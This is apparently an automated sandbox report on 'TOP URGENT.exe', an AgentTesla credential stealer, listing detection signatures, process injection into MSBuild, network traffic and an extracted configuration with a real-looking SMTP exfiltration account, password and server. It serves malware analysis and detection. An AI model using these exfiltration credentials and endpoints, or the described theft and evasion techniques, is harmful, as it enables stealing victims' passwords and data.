Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report TOP URGENT.exe

Overview

General Information

Sample Name:TOP URGENT.exe
Analysis ID:483922
MD5:3af20ee616d2d9c806d27a3c245d4d7b
SHA1:f4448544d0fd560be3a8c1e6ff46670251785267
SHA256:c810e257ac876cb505d076efee941037f5f9fd11464a4af8515d0fbac61509b1
Tags:AgentTeslaexe
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected AntiVM3
Sigma detected: MSBuild connects to smtp port
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Modifies the hosts file
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
.NET source code contains very large strings
Tries to steal Mail credentials (via file access)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Uses SMTP (mail sending)
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • TOP URGENT.exe (PID: 6352 cmdline: 'C:\Users\user\Desktop\TOP URGENT.exe' MD5: 3AF20EE616D2D9C806D27A3C245D4D7B)
    • MSBuild.exe (PID: 6592 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: D621FD77BD585874F9686D3A76462EF1)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Username": "ppc@almuntakhaba.com", "Password": "amite123", "Host": "smtp.almuntakhaba.com"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.501627918.0000000002981000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000004.00000002.501627918.0000000002981000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000000.00000002.244947880.0000000002D91000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
        00000000.00000002.245468332.0000000003D89000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000000.00000002.245468332.0000000003D89000.00000004.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
            Click to see the 6 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            4.2.MSBuild.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              4.2.MSBuild.exe.400000.0.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                0.2.TOP URGENT.exe.3e4d7b0.5.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  0.2.TOP URGENT.exe.3e4d7b0.5.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                    0.2.TOP URGENT.exe.3f5dfd0.4.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                      Click to see the 3 entries

                      Sigma Overview

                      Networking:

                      barindex
                      Sigma detected: MSBuild connects to smtp portShow sources
                      Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 208.91.199.225, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 6592, Protocol: tcp, SourceIp: 192.168.2.3, SourceIsIpv6: false, SourcePort: 49820

                      System Summary:

                      barindex
                      Sigma detected: Possible Applocker BypassShow sources
                      Source: Process startedAuthor: juju4: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, ParentCommandLine: 'C:\Users\user\Desktop\TOP URGENT.exe' , ParentImage: C:\Users\user\Desktop\TOP URGENT.exe, ParentProcessId: 6352, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, ProcessId: 6592

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 4.2.MSBuild.exe.400000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Username": "ppc@almuntakhaba.com", "Password": "amite123", "Host": "smtp.almuntakhaba.com"}
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: TOP URGENT.exeReversingLabs: Detection: 15%
                      Source: 4.2.MSBuild.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                      Source: TOP URGENT.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: unknownHTTPS traffic detected: 20.190.160.131:443 -> 192.168.2.3:49821 version: TLS 1.2
                      Source: TOP URGENT.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: C:\Windows\System.pdbpdbtem.pdb source: MSBuild.exe, 00000004.00000002.505630995.0000000005CE0000.00000004.00000001.sdmp
                      Source: Binary string: l0C:\Windows\MSBuild.pdb source: MSBuild.exe, 00000004.00000002.495388966.0000000000AF8000.00000004.00000001.sdmp
                      Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: MSBuild.exe, 00000004.00000002.505657979.0000000005CE9000.00000004.00000001.sdmp
                      Source: Binary string: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.PDB source: MSBuild.exe, 00000004.00000002.495388966.0000000000AF8000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\exe\MSBuild.pdb source: MSBuild.exe, 00000004.00000002.505554531.0000000005C80000.00000004.00000001.sdmp
                      Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb+ source: MSBuild.exe, 00000004.00000002.495388966.0000000000AF8000.00000004.00000001.sdmp
                      Source: Binary string: MSBuild.PDB source: MSBuild.exe, 00000004.00000002.495388966.0000000000AF8000.00000004.00000001.sdmp
                      Source: Binary string: C:\Windows\MSBuild.pdbpdbild.pdb source: MSBuild.exe, 00000004.00000002.505630995.0000000005CE0000.00000004.00000001.sdmp
                      Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbsmtpalmuntakhaba.com))4 source: MSBuild.exe, 00000004.00000002.505611329.0000000005CD7000.00000004.00000001.sdmp
                      Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbD source: MSBuild.exe, 00000004.00000002.505657979.0000000005CE9000.00000004.00000001.sdmp
                      Source: Binary string: lC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.pdbr source: MSBuild.exe, 00000004.00000002.495388966.0000000000AF8000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.pdb source: MSBuild.exe, 00000004.00000002.505554531.0000000005C80000.00000004.00000001.sdmp
                      Source: Binary string: .pdb source: MSBuild.exe, 00000004.00000002.495388966.0000000000AF8000.00000004.00000001.sdmp
                      Source: Binary string: symbols\exe\MSBuild.pdb source: MSBuild.exe, 00000004.00000002.495388966.0000000000AF8000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb source: MSBuild.exe, 00000004.00000002.505554531.0000000005C80000.00000004.00000001.sdmp

                      Networking:

                      barindex
                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                      Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.3:49820 -> 208.91.199.225:587
                      Source: Joe Sandbox ViewJA3 fingerprint: bd0bf25947d4a37404f0424edf4db9ad
                      Source: Joe Sandbox ViewIP Address: 208.91.199.225 208.91.199.225
                      Source: global trafficTCP traffic: 192.168.2.3:49820 -> 208.91.199.225:587
                      Source: global trafficTCP traffic: 192.168.2.3:49820 -> 208.91.199.225:587
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49678
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49688
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49687
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49686
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49696
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49684
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49696 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49692 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49686 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49684 -> 443
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 93.184.221.240
                      Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
                      Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.35.237.194
                      Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.55.161.160
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
                      Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.55.161.160
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 93.184.221.240
                      Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
                      Source: unknownTCP traffic detected without corresponding DNS query: 93.184.221.240
                      Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.131
                      Source: MSBuild.exe, 00000004.00000002.501627918.0000000002981000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                      Source: MSBuild.exe, 00000004.00000002.501627918.0000000002981000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                      Source: MSBuild.exe, 00000004.00000002.501627918.0000000002981000.00000004.00000001.sdmpString found in binary or memory: http://bEdYOo.com
                      Source: TOP URGENT.exe, 00000000.00000002.248442189.0000000006EC2000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com
                      Source: MSBuild.exe, 00000004.00000002.501627918.0000000002981000.00000004.00000001.sdmp, MSBuild.exe, 00000004.00000002.503782526.0000000002D02000.00000004.00000001.sdmpString found in binary or memory: http://q77LAYiewN5yqbw.net
                      Source: MSBuild.exe, 00000004.00000002.503753112.0000000002CF5000.00000004.00000001.sdmpString found in binary or memory: http://smtp.almuntakhaba.com
                      Source: MSBuild.exe, 00000004.00000002.503753112.0000000002CF5000.00000004.00000001.sdmpString found in binary or memory: http://us2.smtp.mailhostbox.com
                      Source: TOP URGENT.exe, 00000000.00000002.248442189.0000000006EC2000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                      Source: TOP URGENT.exe, 00000000.00000002.248442189.0000000006EC2000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
                      Source: TOP URGENT.exe, 00000000.00000002.248442189.0000000006EC2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
                      Source: TOP URGENT.exe, 00000000.00000002.248442189.0000000006EC2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                      Source: TOP URGENT.exe, 00000000.00000002.248442189.0000000006EC2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                      Source: TOP URGENT.exe, 00000000.00000002.248442189.0000000006EC2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                      Source: TOP URGENT.exe, 00000000.00000002.248442189.0000000006EC2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                      Source: TOP URGENT.exe, 00000000.00000002.248442189.0000000006EC2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                      Source: TOP URGENT.exe, 00000000.00000002.248442189.0000000006EC2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                      Source: TOP URGENT.exe, 00000000.00000002.248442189.0000000006EC2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                      Source: TOP URGENT.exe, 00000000.00000002.248442189.0000000006EC2000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
                      Source: TOP URGENT.exe, 00000000.00000002.248442189.0000000006EC2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                      Source: TOP URGENT.exe, 00000000.00000002.248442189.0000000006EC2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                      Source: TOP URGENT.exe, 00000000.00000002.248442189.0000000006EC2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                      Source: TOP URGENT.exe, 00000000.00000002.248442189.0000000006EC2000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                      Source: TOP URGENT.exe, 00000000.00000002.248442189.0000000006EC2000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                      Source: TOP URGENT.exe, 00000000.00000002.248442189.0000000006EC2000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
                      Source: TOP URGENT.exe, 00000000.00000002.248442189.0000000006EC2000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                      Source: TOP URGENT.exe, 00000000.00000002.248442189.0000000006EC2000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
                      Source: TOP URGENT.exe, 00000000.00000002.248442189.0000000006EC2000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
                      Source: TOP URGENT.exe, 00000000.00000002.248442189.0000000006EC2000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
                      Source: TOP URGENT.exe, 00000000.00000002.248442189.0000000006EC2000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
                      Source: TOP URGENT.exe, 00000000.00000002.248442189.0000000006EC2000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
                      Source: TOP URGENT.exe, 00000000.00000002.248442189.0000000006EC2000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                      Source: TOP URGENT.exe, 00000000.00000002.248442189.0000000006EC2000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                      Source: MSBuild.exe, 00000004.00000002.501627918.0000000002981000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%
                      Source: MSBuild.exe, 00000004.00000002.501627918.0000000002981000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%GETMozilla/5.0
                      Source: TOP URGENT.exe, 00000000.00000002.245468332.0000000003D89000.00000004.00000001.sdmp, MSBuild.exe, 00000004.00000002.493480561.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                      Source: MSBuild.exe, 00000004.00000002.501627918.0000000002981000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
                      Source: unknownDNS traffic detected: queries for: smtp.almuntakhaba.com
                      Source: unknownHTTPS traffic detected: 20.190.160.131:443 -> 192.168.2.3:49821 version: TLS 1.2
                      Source: TOP URGENT.exe, 00000000.00000002.244355309.00000000011B0000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                      Spam, unwanted Advertisements and Ransom Demands:

                      barindex
                      Modifies the hosts fileShow sources
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

                      System Summary:

                      barindex
                      .NET source code contains very large stringsShow sources
                      Source: TOP URGENT.exe, Form1.csLong String: Length: 38272
                      Source: 0.2.TOP URGENT.exe.9f0000.0.unpack, Form1.csLong String: Length: 38272
                      Source: 0.0.TOP URGENT.exe.9f0000.0.unpack, Form1.csLong String: Length: 38272
                      Source: TOP URGENT.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: C:\Users\user\Desktop\TOP URGENT.exeCode function: 0_2_009F8B540_2_009F8B54
                      Source: C:\Users\user\Desktop\TOP URGENT.exeCode function: 0_2_0159E6180_2_0159E618
                      Source: C:\Users\user\Desktop\TOP URGENT.exeCode function: 0_2_0159E6080_2_0159E608
                      Source: C:\Users\user\Desktop\TOP URGENT.exeCode function: 0_2_0159BC740_2_0159BC74
                      Source: C:\Users\user\Desktop\TOP URGENT.exeCode function: 0_2_04D81A100_2_04D81A10
                      Source: C:\Users\user\Desktop\TOP URGENT.exeCode function: 0_2_04D803800_2_04D80380
                      Source: C:\Users\user\Desktop\TOP URGENT.exeCode function: 0_2_04D805D70_2_04D805D7
                      Source: C:\Users\user\Desktop\TOP URGENT.exeCode function: 0_2_04D805F00_2_04D805F0
                      Source: C:\Users\user\Desktop\TOP URGENT.exeCode function: 0_2_04D845800_2_04D84580
                      Source: C:\Users\user\Desktop\TOP URGENT.exeCode function: 0_2_04D806580_2_04D80658
                      Source: C:\Users\user\Desktop\TOP URGENT.exeCode function: 0_2_04D806430_2_04D80643
                      Source: C:\Users\user\Desktop\TOP URGENT.exeCode function: 0_2_04D800400_2_04D80040
                      Source: C:\Users\user\Desktop\TOP URGENT.exeCode function: 0_2_04D800070_2_04D80007
                      Source: C:\Users\user\Desktop\TOP URGENT.exeCode function: 0_2_04D803710_2_04D80371
                      Source: C:\Users\user\Desktop\TOP URGENT.exeCode function: 0_2_08C75CC00_2_08C75CC0
                      Source: C:\Users\user\Desktop\TOP URGENT.exeCode function: 0_2_08C744D10_2_08C744D1
                      Source: C:\Users\user\Desktop\TOP URGENT.exeCode function: 0_2_08C75CD00_2_08C75CD0
                      Source: C:\Users\user\Desktop\TOP URGENT.exeCode function: 0_2_08C744E00_2_08C744E0
                      Source: C:\Users\user\Desktop\TOP URGENT.exeCode function: 0_2_08C794900_2_08C79490
                      Source: C:\Users\user\Desktop\TOP URGENT.exeCode function: 0_2_08C794A00_2_08C794A0
                      Source: C:\Users\user\Desktop\TOP URGENT.exeCode function: 0_2_08C778500_2_08C77850
                      Source: C:\Users\user\Desktop\TOP URGENT.exeCode function: 0_2_08C7C4600_2_08C7C460
                      Source: C:\Users\user\Desktop\TOP URGENT.exeCode function: 0_2_08C750180_2_08C75018
                      Source: C:\Users\user\Desktop\TOP URGENT.exeCode function: 0_2_08C758290_2_08C75829
                      Source: C:\Users\user\Desktop\TOP URGENT.exeCode function: 0_2_08C750300_2_08C75030
                      Source: C:\Users\user\Desktop\TOP URGENT.exeCode function: 0_2_08C758380_2_08C75838
                      Source: C:\Users\user\Desktop\TOP URGENT.exeCode function: 0_2_08C7C1900_2_08C7C190
                      Source: C:\Users\user\Desktop\TOP URGENT.exeCode function: 0_2_08C7AD400_2_08C7AD40
                      Source: C:\Users\user\Desktop\TOP URGENT.exeCode function: 0_2_08C799190_2_08C79919
                      Source: C:\Users\user\Desktop\TOP URGENT.exeCode function: 0_2_08C77D200_2_08C77D20
                      Source: C:\Users\user\Desktop\TOP URGENT.exeCode function: 0_2_08C7712A0_2_08C7712A
                      Source: C:\Users\user\Desktop\TOP URGENT.exeCode function: 0_2_08C799280_2_08C79928
                      Source: C:\Users\user\Desktop\TOP URGENT.exeCode function: 0_2_08C771380_2_08C77138
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00B5F2F84_2_00B5F2F8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00B5C1984_2_00B5C198
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00B561794_2_00B56179
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00B54B404_2_00B54B40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00B5F2984_2_00B5F298
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00B5A6084_2_00B5A608
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00B535904_2_00B53590
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00B529204_2_00B52920
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00B5D3684_2_00B5D368
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00DF0E084_2_00DF0E08
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00E168304_2_00E16830
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00E15AD04_2_00E15AD0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00E1E6504_2_00E1E650
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00E1FA104_2_00E1FA10
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00F4B8C04_2_00F4B8C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00F460B04_2_00F460B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00F428304_2_00F42830
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00F481A44_2_00F481A4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00F405904_2_00F40590
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0280482C4_2_0280482C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0280482E4_2_0280482E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0280D6C04_2_0280D6C0
                      Source: TOP URGENT.exeBinary or memory string: OriginalFilename vs TOP URGENT.exe
                      Source: TOP URGENT.exe, 00000000.00000002.244355309.00000000011B0000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs TOP URGENT.exe
                      Source: TOP URGENT.exe, 00000000.00000000.222779716.00000000009F2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameRuntimeFeatu.exeh$ vs TOP URGENT.exe
                      Source: TOP URGENT.exe, 00000000.00000002.249062547.0000000008E50000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameCF_Secretaria.dll< vs TOP URGENT.exe
                      Source: TOP URGENT.exe, 00000000.00000002.244962828.0000000002D97000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameEnvoySinks.dll6 vs TOP URGENT.exe
                      Source: TOP URGENT.exe, 00000000.00000002.245468332.0000000003D89000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameNuOvAFWSWQdMrKTXvyKfCQZfruIZXIbbF.exe4 vs TOP URGENT.exe
                      Source: TOP URGENT.exeBinary or memory string: OriginalFilenameRuntimeFeatu.exeh$ vs TOP URGENT.exe
                      Source: TOP URGENT.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: TOP URGENT.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: TOP URGENT.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: TOP URGENT.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: TOP URGENT.exeReversingLabs: Detection: 15%
                      Source: TOP URGENT.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\TOP URGENT.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\TOP URGENT.exe 'C:\Users\user\Desktop\TOP URGENT.exe'
                      Source: C:\Users\user\Desktop\TOP URGENT.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                      Source: C:\Users\user\Desktop\TOP URGENT.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
